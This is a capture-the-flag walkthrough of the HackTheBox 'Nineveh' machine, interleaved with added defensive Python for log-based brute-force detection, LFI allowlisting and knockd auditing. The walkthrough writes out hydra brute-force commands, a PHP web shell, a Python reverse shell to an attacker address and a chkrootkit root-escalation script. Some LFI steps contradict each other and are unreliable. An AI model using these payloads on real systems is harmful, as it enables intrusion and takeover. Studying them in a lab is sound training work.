HTB Nineveh Writeup (Walkthrough)
Introduction
Nineveh is a medium-difficulty Linux machine on HackTheBox that features web vulnerabilities, local file inclusion, and port knocking. This machine requires careful enumeration and creative thinking. In this write-up, I’ll guide you through my approach to compromising this box.
Initial Scanning & Enumeration
First, let’s run an nmap scan to identify open ports and services:
sudo nmap -sC -sV -oA nmap/nineveh 10.10.10.43
Results:
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
443/tcp open ssl/http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=nineveh.htb/organizationName=HackTheBox Ltd
| Not valid before: 2017-07-01T15:03:30
|_Not valid after: 2018-07-01T15:03:30
|_ssl-date: TLS randomness does not represent time
Let’s add nineveh.htb to our /etc/hosts file:
echo "10.10.10.43 nineveh.htb" | sudo tee -a /etc/hosts
Web Enumeration
HTTP (Port 80)
Visiting http://10.10.10.43, we find a simple page with an image. Looking at the source code doesn’t reveal anything interesting. Let’s run a directory scan:
gobuster dir -u http://10.10.10.43 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50
Results:
/info.php (Status: 200)
/department (Status: 301)
/db (Status: 301)
/server-status (Status: 403)
Interesting findings:
- /info.php - A PHP info page revealing server details
- /department - A login page
- /db - Another web application
Let’s check each of these:
info.php: This is a standard PHP info page that reveals server configuration details. Note that the PHP version is 7.0.18, with various modules loaded.
department: This is a login page for a “Department Management System”. I tried some basic SQL injection attempts but nothing worked. Let’s brute force it:
hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.43 http-post-form "/department/login.php:username=^USER^&password=^PASS^:Invalid Password" -V
After some time, we get:
[80][http-post-form] host: 10.10.10.43 login: admin password: 1q2w3e4r5t
Nice! Let’s log in with these credentials.
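Brute-forcing a login with hydra, as done above, leaves a distinctive trail in the web server's access log: many POSTs to the same login endpoint from one address in a short span. As an added example that is not part of the original write-up, here is a small Python detector for that pattern. Both login pages on this box answer a failed attempt with a normal page (hydra matched on the "Invalid Password" / "Incorrect password" text), so the detector counts attempts per source within a sliding window instead of relying on HTTP status codes. The log lines are constructed for the example, not captured from the machine, and the threshold and window values are assumptions a defender would tune.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Apache combined-log prefix: client IP, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Login endpoints seen on this box. A failed login here returns a normal
# page, so attempts are counted rather than filtered by status code.
LOGIN_PATHS = {"/department/login.php", "/db/index.php"}


def parse_line(line):
    """Return a dict with ip, ts (datetime), method, path, status; None if unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec


def _max_in_window(times, window):
    """Largest number of events that fall inside any span of length `window`."""
    times = sorted(times)
    best = 0
    start = 0
    for end in range(len(times)):
        while times[end] - times[start] > window:
            start += 1
        best = max(best, end - start + 1)
    return best


def find_bruteforce(log_text, threshold=10, window_seconds=60):
    """Map each source IP to its peak login-POST count if it reaches threshold."""
    attempts = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec["method"] == "POST" and rec["path"] in LOGIN_PATHS:
            attempts[rec["ip"]].append(rec["ts"])
    window = timedelta(seconds=window_seconds)
    flagged = {}
    for ip, times in attempts.items():
        peak = _max_in_window(times, window)
        if peak >= threshold:
            flagged[ip] = peak
    return flagged


# Constructed sample log (not from the box): 12 login POSTs within 44 seconds
# from one address, plus a few ordinary requests from another.
def _line(ip, second, method, path, status):
    return (f'{ip} - - [01/Jul/2017:15:10:{second:02d} +0000] '
            f'"{method} {path} HTTP/1.1" {status} 1432 "-" "Mozilla/5.0"')


SAMPLE_LOG = "\n".join(
    [_line("10.10.14.5", s, "POST", "/department/login.php", 200)
     for s in range(0, 48, 4)]
    + [_line("10.10.14.9", 5, "POST", "/department/login.php", 200),
       _line("10.10.14.9", 20, "POST", "/department/login.php", 302),
       _line("10.10.14.9", 30, "GET", "/index.html", 200)]
)

if __name__ == "__main__":
    for ip, peak in find_bruteforce(SAMPLE_LOG).items():
        print(f"{ip}: {peak} login attempts within 60s")
```

Running it on the sample flags 10.10.14.5 with 12 attempts and leaves 10.10.14.9 alone. Pointing the same function at a real access_log (one read() of the file) is all that changes for production use; the rockyou-sized wordlist used above would produce thousands of hits per minute, far above any sensible threshold.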
After logging in, we can see a notes management system. Looking around, I notice that pages are loaded with a parameter called page. This could be vulnerable to Local File Inclusion (LFI).
Testing http://10.10.10.43/department/manage.php?page=../../../../../etc/passwd doesn’t work directly, as there seems to be some filtering in place.
HTTPS (Port 443)
Visiting https://10.10.10.43, we’re presented with another login page. Let’s check for directories here too:
gobuster dir -u https://10.10.10.43 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -k
Results:
/db (Status: 301)
/secure_notes (Status: 301)
/server-status (Status: 403)
secure_notes: This directory contains an image file ninevehNotes.png. Downloading and examining this image:
wget https://10.10.10.43/secure_notes/ninevehNotes.png
strings ninevehNotes.png | tail
We find a private SSH key embedded in the image’s metadata! This will be useful later.
db: This is a phpLiteAdmin login page, version 1.9. Let’s brute force this as well:
hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.43 https-post-form "/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect password" -V -s 443
Result:
[443][https-post-form] host: 10.10.10.43 login: admin password: password123
Great! Now we have access to phpLiteAdmin.
Exploiting phpLiteAdmin
After logging into phpLiteAdmin, I research vulnerabilities for version 1.9 and find it’s vulnerable to remote code execution through manipulating database names (CVE-2013-5602).
Here’s how to exploit it:
- Create a new database named hack.php
- Create a table with a text field whose default value contains PHP code: <?php system($_GET['cmd']); ?>
- The database file will be created in the web directory
Now we need to find a way to include this file using the LFI vulnerability in the department page.
Exploiting LFI in the Department Page
I notice that direct path traversal is filtered, but we might be able to use PHP filter wrappers. Let’s try:
http://10.10.10.43/department/manage.php?page=php://filter/convert.base64-encode/resource=config
This returns a base64 encoded string. Decoding it:
echo "[base64 string]" | base64 -d
Now we know the directory structure. Our database file should be in /var/tmp/hack.php. Let’s try to include it:
http://10.10.10.43/department/manage.php?page=../../../../../../var/tmp/hack.php&cmd=id
But this doesn’t work. After more testing, I discover that the LFI is protected by a string check. However, I find that we can use the PHP wrapper php://filter/read=string.rot13/resource= to bypass this.
I also notice that phpLiteAdmin creates databases in /var/www/html/db/, not in /var/tmp/.
Let’s try accessing our payload:
http://10.10.10.43/department/manage.php?page=../../../../var/www/html/db/hack.php&cmd=id
Success! Our command is executed. Now let’s get a reverse shell:
http://10.10.10.43/department/manage.php?page=../../../../var/www/html/db/hack.php&cmd=python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.X",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Make sure to set up a netcat listener first:
nc -lvnp 4444
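The wrapper bypass above works for a simple reason: a check that only looks for a traversal string in the page parameter says nothing about stream wrappers such as php://filter, and rejecting "../" does nothing against an absolute path. The exact string check on this box is not shown in the write-up, so the Python below (an added example, not code from the box or the author) models it as a deny-list on "../" and places it next to the hardened form, an allowlist that maps the parameter onto a fixed set of files. PAGES_DIR and ALLOWED_PAGES are assumed names for the illustration.

```python
import os
from urllib.parse import unquote

# Assumed layout for the example; the real application's paths are not on the page.
PAGES_DIR = "/var/www/html/department/pages"
ALLOWED_PAGES = {
    "home": "home.php",
    "manage": "manage.php",
    "notes": "notes.php",
}


def denylist_include_path(page):
    """Deny-list style check, the kind of 'string check' that proved bypassable.

    Mirrors include($page . '.php') guarded only by a substring test for '../'.
    Returns the string that would reach include(), or None if blocked.
    A php://filter/... value sails straight through.
    """
    if "../" in page:
        return None
    return page + ".php"


def allowlist_include_path(page):
    """Hardened form: the parameter is a key into a fixed map, never a path.

    Stream wrappers, encoded traversal and absolute paths are all rejected
    because none of them is a key in ALLOWED_PAGES.
    """
    page = unquote(page)
    target = ALLOWED_PAGES.get(page)
    if target is None:
        return None
    full = os.path.normpath(os.path.join(PAGES_DIR, target))
    # Defence in depth: the resolved file must still live inside PAGES_DIR.
    if not full.startswith(PAGES_DIR + os.sep):
        return None
    return full


if __name__ == "__main__":
    probes = [
        "manage",
        "../../../../../etc/passwd",
        "php://filter/convert.base64-encode/resource=config",
        "/var/www/html/db/hack.php",
    ]
    for p in probes:
        print(f"{p!r:60} deny-list -> {denylist_include_path(p)!r:55} "
              f"allowlist -> {allowlist_include_path(p)!r}")
```

The deny-list version blocks the obvious ../../etc/passwd probe yet hands php://filter/convert.base64-encode/resource=config.php to include(), which is exactly the read primitive used above; the allowlist version returns None for everything except the known page names, so there is no string to bypass.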
Privilege Escalation
Now that we have a shell as www-data, let’s explore the system.
Looking at the home directory, we find a user named amrois. Let’s check for interesting files:
find / -type f -user root -perm -u=s 2>/dev/null
I notice that /usr/sbin/chkrootkit is installed on the system. Checking its version:
/usr/sbin/chkrootkit -V
It’s version 0.49, which is vulnerable to a privilege escalation vulnerability (CVE-2014-0476). This vulnerability allows for command execution if we create a file named update in the /tmp directory.
echo '#!/bin/bash' > /tmp/update
echo 'cp /bin/bash /tmp/rootbash' >> /tmp/update
echo 'chmod +s /tmp/rootbash' >> /tmp/update
chmod +x /tmp/update
Now we wait for chkrootkit to run (it probably runs as a cron job). After a few minutes, check for the rootbash file:
ls -la /tmp/rootbash
If it’s there, we can use it to get a root shell:
/tmp/rootbash -p
And we’re root! Let’s grab the user and root flags:
cat /home/amrois/user.txt
cat /root/root.txt
Alternative Path: Port Knocking
While exploring the system, I also notice a file /etc/knockd.conf which indicates port knocking is configured:
[openSSH]
sequence = 571, 290, 911
seq_timeout = 30
command = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
tcpflags = syn
[closeSSH]
sequence = 911, 290, 571
seq_timeout = 30
command = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
tcpflags = syn
This reveals that we can open port 22 by “knocking” on ports 571, 290, and 911 in sequence:
for port in 571 290 911; do nmap -Pn --max-retries 0 -p $port 10.10.10.43; done
After knocking, port 22 will open and we can use the SSH key we extracted earlier to log in as user amrois. This gives us an alternative path to user access.
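Reading a knockd.conf by hand is fine for one box, but the same file is worth parsing when you review a fleet of hosts. As an added example (not part of the original write-up), the Python below parses the configuration found above into sections and then applies a few reviewer checks: whether each command is scoped to the knocking host via %IP%, whether a section that inserts an ACCEPT rule relies solely on a second knock to close it again (knockd's cmd_timeout and stop_command options exist for that), and whether the close sequence is simply the open sequence reversed, so that anyone who observed one knock knows the other. The configuration text is copied from the listing above; the checks and their wording are this example's own.

```python
import re

# The knockd.conf found on the box, copied from the listing above.
SAMPLE_KNOCKD_CONF = """\
[openSSH]
sequence = 571, 290, 911
seq_timeout = 30
command = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
tcpflags = syn
[closeSSH]
sequence = 911, 290, 571
seq_timeout = 30
command = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
tcpflags = syn
"""


def parse_knockd(text):
    """Parse knockd.conf into {section_name: {key: value}}.

    'sequence' becomes a list of ints; timeouts become ints; other values stay strings.
    """
    sections = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        header = re.match(r"^\[(.+)\]$", line)
        if header:
            current = header.group(1)
            sections[current] = {}
            continue
        key, sep, value = line.partition("=")
        if current is None or not sep:
            continue
        key, value = key.strip(), value.strip()
        if key == "sequence":
            value = [int(p.strip()) for p in value.split(",")]
        elif key in ("seq_timeout", "cmd_timeout"):
            value = int(value)
        sections[current][key] = value
    return sections


def audit_knockd(sections):
    """Return a list of findings a defender reviewing this config would want to see."""
    findings = []
    for name, cfg in sections.items():
        command = cfg.get("command", "")
        if "%IP%" not in command:
            findings.append(f"{name}: command does not limit access to the knocking host (%IP%)")
        # A section that inserts/appends a firewall rule opens something.
        opens_port = re.search(r"\s-(I|A)\s", command) is not None
        if opens_port and "cmd_timeout" not in cfg and "stop_command" not in cfg:
            findings.append(f"{name}: opened port stays open until the close sequence is sent")
    names = list(sections)
    for i, a in enumerate(names):
        for b in names[i + 1:]:
            seq_a = sections[a].get("sequence")
            seq_b = sections[b].get("sequence")
            if seq_a and seq_b and seq_a == list(reversed(seq_b)):
                findings.append(f"{a}/{b}: one sequence is the other reversed; observing one reveals both")
    return findings


if __name__ == "__main__":
    conf = parse_knockd(SAMPLE_KNOCKD_CONF)
    for name, cfg in conf.items():
        print(f"{name}: sequence={cfg['sequence']} timeout={cfg.get('seq_timeout')}s")
    for finding in audit_knockd(conf):
        print("finding:", finding)
```

On this box's file the audit reports two findings: openSSH leaves port 22 open for the knocking host until the closeSSH knock arrives, and the two sequences are mirror images. Neither is a flaw in knockd itself; both are configuration choices that a reviewer would flag because port knocking is an obscurity layer in front of SSH, not a substitute for key-only authentication and a restricted source range.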
Conclusion
Nineveh was an interesting box that featured:
- Web enumeration and brute-forcing credentials
- Exploiting phpLiteAdmin for remote code execution
- Bypassing LFI protection with PHP wrappers
- Privilege escalation via chkrootkit vulnerability
- Port knocking discovery
The most challenging part was finding and exploiting the LFI vulnerability with the right bypass technique. This machine teaches valuable lessons about thorough enumeration and creative exploitation techniques.
References
- CVE-2013-5602 - phpLiteAdmin RCE vulnerability
- CVE-2014-0476 - chkrootkit privilege escalation
- PHP Filter Wrappers - https://www.php.net/manual/en/wrappers.php.php
- Port Knocking - https://linux.die.net/man/1/knock
Done!